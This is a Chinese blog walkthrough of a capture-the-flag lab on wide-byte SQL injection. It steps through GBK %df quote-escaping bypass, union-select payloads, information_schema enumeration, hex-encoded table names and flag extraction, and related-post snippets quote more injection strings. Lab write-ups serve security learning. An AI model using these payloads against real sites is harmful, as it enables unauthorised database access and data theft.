安鸾渗透实战平台|宽字符注入

最新推荐文章于 2022-11-21 20:56:57 发布
最新推荐文章于 2022-11-21 20:56:57 发布
阅读量2.8k 收藏 2
点赞数 1
分类专栏: Web安全 信息安全 渗透测试学习 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m_de_g/article/details/122004190
版权

安鸾渗透实战平台|宽字符注入

一、渗透靶场地址

http://www.whalwl.work:8011

二、渗透实战

1.先使用1'进行测试,发现被斜杆转义
在这里插入图片描述
2.根据题目提示,直接上手宽字节注入,可以成功

?id=1%df'--+

在这里插入图片描述

3.测试or,and,==是否被过滤

?id=1%df' or 1=1--+

在这里插入图片描述
4.判断列

?id=1%df' order by 1,2,3,4,5,6--+

在这里插入图片描述

5.发现有5列,判断注入点

?id=0%df' union select 1,2,3,4,5--+

在这里插入图片描述
6.发现2,3,4等三个位置均存在注入,我们就以3为例,爆破数据库

?id=0%df' union select 1,2,database(),4,5--+

在这里插入图片描述
7.得到数据库kzf,爆破数据表

?id=0%df' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5--+

在这里插入图片描述
8.因为我们要获取的是flag,因此选用this_flag这张表,爆破字段名

?id=0%df' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='this_flag'),4,5--+

在这里插入图片描述
9.因为这里转义了单引号,我们采用字符串转十六进制绕过
字符串转十六进制网址:https://www.sojson.com/hexadecimal.html
在这里插入图片描述
10.记得在十六进制数之前加上0x,成功爆破字段名

?id=0%df' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x746869735f666c6167),4,5--+

在这里插入图片描述
11.爆破字段内容

?id=0%df' union select 1,2,(select flag from this_flag limit 0,1),4,5--+

在这里插入图片描述
12.成功得到flag.

山川绿水
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安鸾渗透实战平台|SQL数字型GET注入02
m_de_g的博客
12-04 1485
安鸾渗透实战平台|SQL数字型GET注入02 一、渗透靶场地址 http://whalwl.work:8034/ 二、渗透实战 1.开始以为渗透后台,避免采坑 admin' or 1=1 # 123 直接就进入后台啦 2.实战开始,在搜索中输入1',报错 1' 3.当我们在后面加个#时,正常回显 1'# 4.判断or,and,空格或等号是否被过滤 1' or 1=1# 1' and 1=1# 根据报错信息,发现过滤了等号,使用like绕过 1' or 1 like 1# 1' a
安鸾靶场 字符注入02 靶场练习 详细过程及解决问题笔记
AAAAAAAAAAAA66的博客
02-06 3339
题目 网站URL ECSHOP演示站 - Powered by ECShop 目录 笔记 过程 进入sql注入页面 问题 判断闭合符 sql注入下的模糊查询 right 语法爆字段值 笔记 对现在我来说难度其实不大,但题目考察的一些细节要求比较高。 首先把我遇到的问题 一 一 列出。(在下面解题的过程会一 一 解决) 题目虽然是叫字符注入,但实际考察的是报错注入 (挂羊头卖狗肉) 这个网站很大,注入点很难找(我也是看一位师傅的write up) 自己没有...
安鸾平台字节注入
你的网线学长吖
03-18 3918
1.题目URL:http://47.103.94.191:8011 2.首先尝试加’,发现被转义为. 但是当数据库编码为GBK时,可以使用字节注入,先在地址后面加%df,因为反斜杠的编码为%5c,gbk中%df%5c是繁体字 所以说在1和’中间添加%df 加入后发现 合理 3.尝试爆破 爆数据库:union select 1,database(),3,4,5 --+ 报表: union select 1,group_concat(table_name),3,4,5 from information_s
安鸾渗透实战平台wp(持续更新)
Delity的博客
05-13 6786
一、SQL注入 SQL数字型GET注入01 漏洞URL:http://www.whalwl.top:8001/bug/sql_injection/sql_num.php 1’报错,输入-1返回正常,构造payload, 判断字段:显示位在第二位和第三位 -1 order by 3 # 爆库: -1 union select 1,database(),3 # 爆表: -1 union select 1,group_concat(table_name),3 from information_sch
SQL注入绕过实战案例
最新发布
08-31
我们将基于sqli-labs-master靶场进行学习,这是一个专门用于SQL注入攻防演练的平台。 SQL注入(SQL Injection)是攻击者在Web应用的输入参数中插入恶意SQL代码,从而控制或操纵后台数据库服务器的一种技术。这种...
实战注入漏洞检测网站.rar
05-08
"实战注入漏洞检测网站.rar"这个压缩包文件很可能是包含了一套用于检测和学习注入漏洞的实际操作平台或者源码。下面,我们将深入探讨注入漏洞的相关知识,以及如何进行检测。 首先,注入漏洞主要分为几种类型: 1....
防止xss和sql注入:JS特殊字符过滤正则
10-27
总结起来,防止XSS和SQL注入需要综合运用多种技术,包括但不限于前端的特殊字符过滤、后端的输入验证和安全编程。对于JavaScript中的特殊字符过滤,提供的函数`stripscript`是一个基础的示例,但实际应用中应考虑更...
WINHTTP字符API.rar
04-05
WINHTTP字符API.rar WINHTTP字符API.rar WINHTTP字符API.rar WINHTTP字符API.rar WINHTTP字符API.rar WINHTTP字符API.rar
SOAP注入学习——安鸾靶场---SOAP协议注入 练习记录
AAAAAAAAAAAA66的博客
02-02 2683
新年好啊! 今天初二,给大家拜个年了,也祝师傅们新的一年取得更大的进步。 SOAP注入知识点 SOAP注入 - 知乎 ????????????????????????????????????????????????详细的大家可以看上面掌控者学院的解释(不是广告)。 当然,如果想仔细理解的话,看上面的解释已经是足够了,不过,我觉得大家还是喜欢听人话。。。。。。。。。。。。。。 大家如果熟悉sql注入的话,肯定是知道我们输入的数据会放在数据库进行比较的,一般我们通过拼接语句,进而爆出数据库的东
安鸾渗透实战平台-sql注入
weixin_48421613的博客
01-04 3212
sql注入安鸾渗透实战平台是一个在线的靶场平台,需要通过一些列手段找到flag提交 文章目录sql注入篇SQL字符注入(1-2)一、需识别mysql默认的information库二、内部结构1.schemata表内容2.tables表内容3.columns表内容4.解题思路SQL搜索型注入总结 SQL字符注入(1-2) 开始忘记截图了,只好给大家直接写一下payload了 提示:仅适合参考 一、需识别mysql默认的information库 mysql 5.0版本以上会有一个默认的infor
Right 注入语法-转mysql注入时当字符太长显示不全的-安鸾靶场 字符注入02
zyf007love的博客
09-12 240
Right 注入语法
安鸾渗透实战平台(基础)——Linux基础命令 (100分)
weixin_50985113的博客
04-08 3252
漏洞环境 安鸾渗透实战平台 windows机器一台(用作ssh登录) 题目: 使用windows的命令行登录看看情况 ssh test@47.100.220.113 -p2233 ssh:ssh协议 test:用户名 47.100.220.113:ip -p:指定端口 找文件 用ls查看一下啥也没有 用ls -all 找到隐藏文件 linux中文件前面带.的为隐藏文件 我们用cat查看一下获得上卷(九阴真经打钱!) 用cd跳到根目录下寻找,提示权限不够 cd… cd… find -name
SQL字节注入01
海宝最美的博客
12-20 276
靶机地址:http://www.whalwl.top:8011【2020年8月前有效】 1、http://www.whalwl.top:8011/wide.php?id=1%bf' and 1=1 %23 //不报错 http://www.whalwl.top:8011/wide.php?id=1%bf' and 1=2%23 //报错 代码执行,说明存在注入 2、i...
web渗透--33--字节注入
武天旭的博客
09-16 989
1、漏洞描述: 字节注入是相对于单字节注入而言的,该注入跟HTML页面编码无关,字节注入常见于mysql中,GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的字节,实际上只有两字节。字节带来的安全问题主要是吃ASCII字符(一字节)的现象,当%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了%df...
安鸾之RCE系列
柠鹿的轨迹
08-28 805
0x00 webshell&中国菜刀 0o00 题目提示 0o01 执行过程 0x01 命令执行01 0o00 题目提示 0o01 Linux命令符 0o02 执行过程 0x02 破壳漏洞 0o00 题目提示 0o01 ShellShock 0o01 执行过程 0x03 PHPmailer 0o00 题目提示 0o01 phpMailer 0o02 执行过程 0x04 命令执行02 0o00 题目提示 0o01 DNSlog 0o01 执行过程...
安鸾渗透实战平台安全基础/( 全 | 通关 )
qq_34485854的博客
11-21 2340
靶场WP | 安鸾渗透实战平台 / 安全基础 | 通关
墨者学院sql注入字节注入
weixin_45819911的博客
07-14 490
墨者学院sql注入字节注入)闲谈0x00 判断注入点:0x01 原理解析:0x02 构造payload:附录 闲谈 刚毕业,网络安全小白一名,第一次写笔记记录下自己学习的点点滴滴,写的不好大佬勿喷。 0x00 判断注入点: 其实没有什么判断的,因为之前做的注入点都存在与下图界面,图1: 因为题目提示是字节注入,所以可能会用到%df ,%e5%5c,%e9%8c%a6。 注入点存在于url:http://219.153.49.228:42636/new_list.php?id=1 判断是否存在注入,如
安鸾sql字符02
07-28
抱歉,我无法回答关于安鸾SQL字符02的问题。 #### 引用[.reference_title] - *1* [安鸾SQL系列之数字字符串](https://blog.csdn.net/weixin_46318141/article/details/123917863)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [安鸾靶场 字符注入02 靶场练习 详细过程及解决问题笔记](https://blog.csdn.net/AAAAAAAAAAAA66/article/details/122800595)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值